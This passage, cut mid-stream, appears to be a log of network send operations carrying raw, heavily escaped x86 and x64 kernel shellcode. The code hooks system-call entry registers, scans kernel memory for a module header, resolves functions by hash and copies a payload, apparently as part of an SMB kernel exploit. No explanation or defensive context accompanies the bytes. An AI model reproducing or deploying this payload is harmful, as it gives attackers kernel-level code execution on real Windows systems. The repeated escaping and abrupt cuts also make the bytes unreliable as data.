\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR
\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xeb\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\r@\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\xc0@\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\
x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\x8b@\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\x8b@<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\xc0@\
\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\x01@\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\
\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', '(\\'send\\', 15, b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\
\\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00
\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\xc0@\\\\x90t\\\\x08\\\\xe8\\\\t\\\\x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\r@\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\r@\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea 
\\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\xc0@\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\
x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\xe9@\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\x